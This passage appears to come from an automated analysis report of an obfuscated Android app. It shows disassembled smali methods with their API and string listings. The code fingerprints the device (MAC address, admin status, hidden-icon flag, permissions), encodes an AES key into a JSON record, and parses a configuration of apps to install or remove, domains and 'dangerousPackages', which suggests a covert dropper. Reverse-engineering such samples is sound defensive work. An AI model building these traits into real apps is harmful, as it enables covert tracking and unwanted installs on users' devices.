22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.PYViEQnPOshkW8.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/PYViEQnPOshkW8;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/PYViEQnPOshkW8;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.S49U6BODT8.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/S49U6BODT8;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/S49U6BODT8;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.WJY2Ahxkjz.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/WJY2Ahxkjz;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/WJY2Ahxkjz;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
Cross References
APIs
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONObject.<init>
  • org.json.JSONException.printStackTrace
Strings
  • wyiutrbelnq
Position Instruction Meta Information
0try_start_0:
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
3const-string v1, "wyiutrbelnq"
5const-string v2, ""
7invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
8move-result-object v0
10invoke-static {v0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
11move-result v1
12if-eqz v1, :cond_18
13new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
14const-wide/16 v1, 0x0
16invoke-direct {v0, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;-><init>(J)V
17goto_17: return-object v0
18cond_18: new-instance v1, Lorg/json/JSONObject;
20invoke-direct {v1, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
22invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
23try_end_20: move-result-object v0
24goto/16 :goto_17
25catch_22: move-exception v0
27invoke-virtual {v0}, Lorg/json/JSONException;->printStackTrace()V
28const/4 v0, 0x0
29goto/16 :goto_17
Cross References
APIs
  • android.app.ActivityManager.getRunningTasks
  • java.util.List.isEmpty
  • java.util.List.get
  • android.content.ComponentName.getClassName
  • java.lang.String.equals
Position Instruction Meta Information
0const/4 v2, 0x1
1const/4 v1, 0x0
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;->DiXsQ:Landroid/app/ActivityManager;
5invoke-virtual {v0, v2}, Landroid/app/ActivityManager;->getRunningTasks(I)Ljava/util/List;
6move-result-object v0
8invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
9move-result v3
10if-nez v3, :cond_24
12invoke-interface {v0, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
13move-result-object v0
14check-cast v0, Landroid/app/ActivityManager$RunningTaskInfo;
16iget-object v0, v0, Landroid/app/ActivityManager$RunningTaskInfo;->topActivity:Landroid/content/ComponentName;
18invoke-virtual {v0}, Landroid/content/ComponentName;->getClassName()Ljava/lang/String;
19move-result-object v0
21iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;->Odjrct:Ljava/lang/String;
23invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
24move-result v0
25if-nez v0, :cond_24
26move v0, v1
27goto_23: return v0
28cond_24: move v0, v2
29goto/16 :goto_23
Cross References
APIs
  • android.content.Context.getSystemService
  • android.net.wifi.WifiManager.getConnectionInfo
  • android.net.wifi.WifiInfo.getMacAddress
Strings
  • wifi
Position Instruction Meta Information
0try_start_0:
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->hZyMGHgz:Landroid/net/wifi/WifiManager;
2if-nez v0, :cond_10
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->DiXsQ:Landroid/content/Context;
6const-string v1, "wifi"
8invoke-virtual {v0, v1}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
9move-result-object v0
10check-cast v0, Landroid/net/wifi/WifiManager;
11iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->hZyMGHgz:Landroid/net/wifi/WifiManager;
12cond_10:
13iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->hZyMGHgz:Landroid/net/wifi/WifiManager;
15invoke-virtual {v0}, Landroid/net/wifi/WifiManager;->getConnectionInfo()Landroid/net/wifi/WifiInfo;
16move-result-object v0
18invoke-virtual {v0}, Landroid/net/wifi/WifiInfo;->getMacAddress()Ljava/lang/String;
19try_end_19: move-result-object v0
20goto_1a: return-object v0
21catch_1b: move-exception v0
23const-string v0, ""
24goto/16 :goto_1a
Cross References
APIs
  • java.lang.Object.getClass
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
Strings
  • stop
Position Instruction Meta Information
0const/4 v3, 0x0
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ:Ljava/lang/Object;
4invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
5move-result-object v0
7const-string v1, "stop"
8new-array v2, v3, [Ljava/lang/Class;
10invoke-virtual {v0, v1, v2}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
11move-result-object v0
13iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ:Ljava/lang/Object;
14new-array v2, v3, [Ljava/lang/Object;
16invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
17iput-boolean v3, p0, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->Odjrct:Z
18return-void
Cross References
APIs
  • javax.crypto.KeyGenerator.getInstance
  • javax.crypto.KeyGenerator.init
  • javax.crypto.KeyGenerator.generateKey
Strings
  • AES
Position Instruction Meta Information
1const-string v0, "AES"
3invoke-static {v0}, Ljavax/crypto/KeyGenerator;->getInstance(Ljava/lang/String;)Ljavax/crypto/KeyGenerator;
4move-result-object v0
5const/16 v1, 0x80
7invoke-virtual {v0, v1}, Ljavax/crypto/KeyGenerator;->init(I)V
9invoke-virtual {v0}, Ljavax/crypto/KeyGenerator;->generateKey()Ljavax/crypto/SecretKey;
10move-result-object v0
11return-object v0
APIs
  • android.app.Service.stopForeground
  • android.app.Service.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zAKRpGn;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
3invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->xnLvoQ(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)Landroid/app/Service;
4move-result-object v0
5if-eqz v0, :cond_1b
7iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zAKRpGn;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
9invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->xnLvoQ(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)Landroid/app/Service;
10move-result-object v0
11const/4 v1, 0x1
13invoke-virtual {v0, v1}, Landroid/app/Service;->stopForeground(Z)V
15iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zAKRpGn;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
17invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->xnLvoQ(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)Landroid/app/Service;
18move-result-object v0
20invoke-virtual {v0}, Landroid/app/Service;->stopSelf()V
21cond_1b:
22iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zAKRpGn;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
24invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->LmcGi(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)V
26invoke-static {}, Landroid/os/Process;->myPid()I
27move-result v0
29invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
30return-void
Cross References
APIs
  • java.lang.Object.getClass
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Exception.printStackTrace
Position Instruction Meta Information
0try_start_0:
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->Odjrct:Ljava/lang/Object;
3invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
4move-result-object v0
5const/4 v1, 0x0
6new-array v1, v1, [Ljava/lang/Class;
8invoke-virtual {v0, p1, v1}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
9move-result-object v0
11iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;->Odjrct:Ljava/lang/Object;
12const/4 v2, 0x0
13new-array v2, v2, [Ljava/lang/Object;
15invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
16try_end_15: return-void
17catch_16: move-exception v0
19invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
20goto/16 :goto_15
Cross References
APIs
  • android.net.ConnectivityManager.getActiveNetworkInfo
  • android.net.NetworkInfo.getSubtype
Position Instruction Meta Information
0const/16 v7, 0xc
1const/4 v1, 0x1
2const/16 v6, 0xb
3const/4 v0, 0x0
4const/4 v2, 0x2
6invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->LmcGi()Z
7move-result v3
8if-eqz v3, :cond_13
10invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->CyGFDR()Z
11move-result v3
12if-nez v3, :cond_14
13goto_13: return v0
14cond_14:
15iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
17invoke-virtual {v3}, Landroid/net/ConnectivityManager;->getActiveNetworkInfo()Landroid/net/NetworkInfo;
18move-result-object v3
19if-eqz v3, :cond_13
21invoke-virtual {v3}, Landroid/net/NetworkInfo;->getSubtype()I
22move-result v3
23packed-switch v3, :pswitch_data_5c
24pswitch_23: sget v4, Landroid/os/Build$VERSION;->SDK_INT:I
25const/16 v5, 0x8
26if-lt v4, v5, :cond_2f
27if-ne v3, v6, :cond_2f
28move v0, v1
29goto/16 :goto_13
30pswitch_2d: move v0, v1
31goto/16 :goto_13
32cond_2f: packed-switch v3, :pswitch_data_6e
33pswitch_32: sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
34const/16 v4, 0x9
35if-lt v1, v4, :cond_3e
36if-ne v3, v7, :cond_3e
37move v0, v2
38goto/16 :goto_13
39pswitch_3c: move v0, v2
40goto/16 :goto_13
41cond_3e: sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
42if-lt v1, v6, :cond_48
43const/16 v1, 0xe
44if-ne v3, v1, :cond_48
45move v0, v2
46goto/16 :goto_13
47cond_48: sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
48if-lt v1, v7, :cond_52
49const/16 v1, 0xf
50if-ne v3, v1, :cond_52
51move v0, v2
52goto/16 :goto_13
53cond_52: sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
54if-lt v1, v6, :cond_13
55const/16 v1, 0xd
56if-ne v3, v1, :cond_13
57const/4 v0, 0x3
58goto/16 :goto_13
Cross References
APIs
  • android.net.ConnectivityManager.getActiveNetworkInfo
  • android.net.NetworkInfo.getType
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
3invoke-virtual {v0}, Landroid/net/ConnectivityManager;->getActiveNetworkInfo()Landroid/net/NetworkInfo;
4move-result-object v0
5if-eqz v0, :cond_10
7invoke-virtual {v0}, Landroid/net/NetworkInfo;->getType()I
8move-result v0
9if-nez v0, :cond_10
10const/4 v0, 0x1
11goto_f: return v0
12cond_10: const/4 v0, 0x0
13goto/16 :goto_f
Cross References
APIs
  • android.net.ConnectivityManager.getActiveNetworkInfo
  • android.net.NetworkInfo.isConnected
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
3invoke-virtual {v0}, Landroid/net/ConnectivityManager;->getActiveNetworkInfo()Landroid/net/NetworkInfo;
4move-result-object v0
5if-eqz v0, :cond_10
7invoke-virtual {v0}, Landroid/net/NetworkInfo;->isConnected()Z
8move-result v0
9if-eqz v0, :cond_10
10const/4 v0, 0x1
11goto_f: return v0
12cond_10: const/4 v0, 0x0
13goto/16 :goto_f
Cross References
APIs
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
  • org.json.JSONArray.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • org.json.JSONArray.put
  • org.json.JSONObject.put
Strings
  • SdkId
  • SdkHash
  • Scope
  • Build
  • LoadTime
  • InstallTime
  • Package
  • Tag
  • Param1
  • Param2
  • IsAdmin
  • Installer
  • Referrer
  • Permissions
  • IsApk
  • TrackLabel
  • IsIconHidden
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONObject;
2invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
4const-string v0, "SdkId"
5iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DiXsQ:I
7invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
9const-string v0, "SdkHash"
11iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->Odjrct:Ljava/lang/String;
13invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
15const-string v0, "Scope"
17iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->LmcGi:Ljava/lang/String;
19invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
21const-string v0, "Build"
22iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xnLvoQ:I
24invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
26const-string v0, "LoadTime"
27iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->jVOak:I
29invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
31const-string v0, "InstallTime"
32iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->CyGFDR:I
34invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
36const-string v0, "Package"
38iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->EZmcnv:Ljava/lang/String;
40invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
42const-string v0, "Tag"
44iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->phHwgb:Ljava/lang/String;
46invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
48const-string v0, "Param1"
50iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->uKFQsLn:Ljava/lang/String;
52invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
54const-string v0, "Param2"
56iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->lVfyLT:Ljava/lang/String;
58invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
60const-string v0, "IsAdmin"
61iget-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xfPEz:Z
63invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
65const-string v0, "Installer"
67iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->IwTvjRW:Ljava/lang/String;
69invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
71const-string v0, "Referrer"
73iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->ciatqPxI:Ljava/lang/String;
75invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
76new-instance v2, Lorg/json/JSONArray;
78invoke-direct {v2}, Lorg/json/JSONArray;-><init>()V
80iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DoHnmwOG:Ljava/util/List;
82invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
83move-result-object v3
84goto_6b:
85invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
86move-result v0
87if-eqz v0, :cond_7b
89invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
90move-result-object v0
91check-cast v0, Ljava/lang/String;
93invoke-virtual {v2, v0}, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
94goto/16 :goto_6b
95cond_7b:
96const-string v0, "Permissions"
98invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
100const-string v0, "IsApk"
101iget-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->FySkt:Z
103invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
105const-string v0, "TrackLabel"
107iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->hZyMGHgz:Ljava/lang/String;
109invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
111const-string v0, "IsIconHidden"
112iget-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->TikzFyJI:Z
114invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
115return-object v1
Cross References
APIs
  • org.json.JSONObject.<init>
  • java.security.Key.getEncoded
  • android.util.Base64.encodeToString
  • org.json.JSONObject.put
  • com.czybg.eqtbdmzpklrgyns.cXdqo.getAbsolutePath
  • org.json.JSONObject.put
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
Strings
  • file
  • cnt
  • filepath
  • info
  • hash
  • type
  • pkg
  • scp
  • act
  • createdAt
  • startedAt
Position Instruction Meta Information
0new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
4const-string v1, "file"
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/Module;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/cXdqo;
7new-instance v3, Lorg/json/JSONObject;
9invoke-direct {v3}, Lorg/json/JSONObject;-><init>()V
11const-string v4, "cnt"
13iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;
15iget-object v5, v5, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;->Odjrct:Ljava/security/Key;
17invoke-interface {v5}, Ljava/security/Key;->getEncoded()[B
18move-result-object v5
19const/4 v6, 0x0
21invoke-static {v5, v6}, Landroid/util/Base64;->encodeToString([BI)Ljava/lang/String;
22move-result-object v5
24invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
26const-string v4, "filepath"
28invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;->getAbsolutePath()Ljava/lang/String;
29move-result-object v2
31invoke-virtual {v3, v4, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
33invoke-virtual {v0, v1, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
35const-string v1, "info"
37iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
38new-instance v3, Lorg/json/JSONObject;
40invoke-direct {v3}, Lorg/json/JSONObject;-><init>()V
42const-string v4, "hash"
44iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->Odjrct:Ljava/lang/String;
46invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
48const-string v4, "type"
49iget v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
51invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
53const-string v4, "pkg"
55iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->LmcGi:Ljava/lang/String;
57invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
59const-string v4, "scp"
61iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->hZyMGHgz:Ljava/lang/String;
63invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
65const-string v4, "act"
66iget-boolean v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->xnLvoQ:Z
68invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
70const-string v4, "createdAt"
71iget-wide v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->jVOak:J
73invoke-virtual {v3, v4, v5, v6}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
75const-string v4, "startedAt"
76iget-wide v5, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->CyGFDR:J
78invoke-virtual {v3, v4, v5, v6}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
80invoke-virtual {v0, v1, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
81return-object v0
Cross References
APIs
  • org.json.JSONObject.getInt
  • org.json.JSONObject.getJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getInt
  • java.lang.Integer.valueOf
  • java.util.List.add
  • org.json.JSONObject.getJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getInt
  • java.lang.Integer.valueOf
  • java.util.List.add
  • org.json.JSONObject.optJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.List.add
  • org.json.JSONObject.optJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.List.add
  • org.json.JSONObject.optJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.ArrayList.add
  • org.json.JSONObject.optBoolean
Strings
  • delay
  • installs
  • removes
  • domains
  • reservedDomains
  • dangerousPackages
  • hic
Position Instruction Meta Information
0const/4 v1, 0x0
1new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;
3invoke-direct {v2}, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;-><init>()V
5const-string v0, "delay"
7invoke-virtual {p0, v0}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
8move-result v0
9iput v0, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->Odjrct:I
11const-string v0, "installs"
13invoke-virtual {p0, v0}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
14move-result-object v3
15move v0, v1
16goto_15:
17invoke-virtual {v3}, Lorg/json/JSONArray;->length()I
18move-result v4
19if-ge v0, v4, :cond_2b
21iget-object v4, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->LmcGi:Ljava/util/List;
23invoke-virtual {v3, v0}, Lorg/json/JSONArray;->getInt(I)I
24move-result v5
26invoke-static {v5}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
27move-result-object v5
29invoke-interface {v4, v5}, Ljava/util/List;->add(Ljava/lang/Object;)Z
30add-int/lit8 v0, v0, 0x1
31goto/16 :goto_15
32cond_2b:
33const-string v0, "removes"
35invoke-virtual {p0, v0}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
36move-result-object v3
37move v0, v1
38goto_32:
39invoke-virtual {v3}, Lorg/json/JSONArray;->length()I
40move-result v4
41if-ge v0, v4, :cond_48
43iget-object v4, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->hZyMGHgz:Ljava/util/List;
45invoke-virtual {v3, v0}, Lorg/json/JSONArray;->getInt(I)I
46move-result v5
48invoke-static {v5}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
49move-result-object v5
51invoke-interface {v4, v5}, Ljava/util/List;->add(Ljava/lang/Object;)Z
52add-int/lit8 v0, v0, 0x1
53goto/16 :goto_32
54cond_48:
55const-string v0, "domains"
57invoke-virtual {p0, v0}, Lorg/json/JSONObject;->optJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
58move-result-object v3
59if-eqz v3, :cond_63
60move v0, v1
61goto_51:
62invoke-virtual {v3}, Lorg/json/JSONArray;->length()I
63move-result v4
64if-ge v0, v4, :cond_63
66iget-object v4, v2, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->xnLvoQ:Ljava/util/List;
68invoke-virtual {v3, v0}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
69move-result-object v5
71invoke-interface {v4, v5}, Ljava/util/List;->add(Ljava/lang/Object;)Z
72add-int/lit8 v0, v0, 0x1
73goto/16 :goto_51
74cond_63:
75const-string v0, "reservedDomains"
77invoke-virtual {p0, v0}, Lorg/json/JSONObject;->optJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
78move-result-object v4
79if-eqz v3, :cond_7e
80move v0, v1
81goto_6c:
82invoke-virtual {v4}, Lorg/json/JSONArray;->length()I
83move-result v3
